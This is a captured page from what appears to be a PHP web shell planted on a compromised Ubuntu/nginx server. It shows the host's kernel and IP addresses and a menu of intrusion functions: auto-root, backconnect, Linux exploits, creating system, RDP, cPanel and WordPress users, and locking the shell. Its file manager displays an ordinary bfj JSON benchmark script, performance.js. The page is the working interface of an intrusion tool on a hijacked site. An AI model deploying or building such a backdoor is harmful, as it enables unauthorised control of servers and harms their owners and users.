Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
bfj /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
unit
[ DIR ]
dr-xr-xr-x
integration.js
10.47
KB
-rw-rw-rw-
performance.js
1.45
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : performance.js
#!/usr/bin/env node 'use strict' const fs = require('fs') const path = require('path') const check = require('check-types') const bfj = require('../src') const inPath = getDataPath('.json'); let time = process.hrtime() if (process.argv.length === 4) { const stuff = [] const stream = bfj.match(fs.createReadStream(inPath), process.argv[3]) stream.on('data', thing => stuff.push(thing)) stream.on('end', () => { reportTime() console.log('hooray!', stuff.length) fs.writeFileSync(getDataPath('-result.ndjson'), stuff.map(s => JSON.stringify(s)).join('\n'), { encoding: 'utf8', }) process.exit(0) }) stream.on('error', error => { console.error('error!', error.stack) process.exit(1) }) stream.on('dataError', error => { console.error('dataError!', error.stack) process.exit(2) }) } else { console.log('reading json') bfj.read(inPath) .then(data => { reportTime() console.log('writing json') return bfj.write(getDataPath('-result.json'), data) }) .then(() => done('succeeded')) .catch(error => done(error.stack, 1)) } function getDataPath (suffix) { return path.resolve(__dirname, process.argv[2] + suffix) } function reportTime () { let interimTime = process.hrtime(time) console.log('%d seconds and %d nanoseconds', interimTime[0], interimTime[1]) time = process.hrtime() } function done (message, code) { reportTime() console.log(message) process.exit(code) }
Close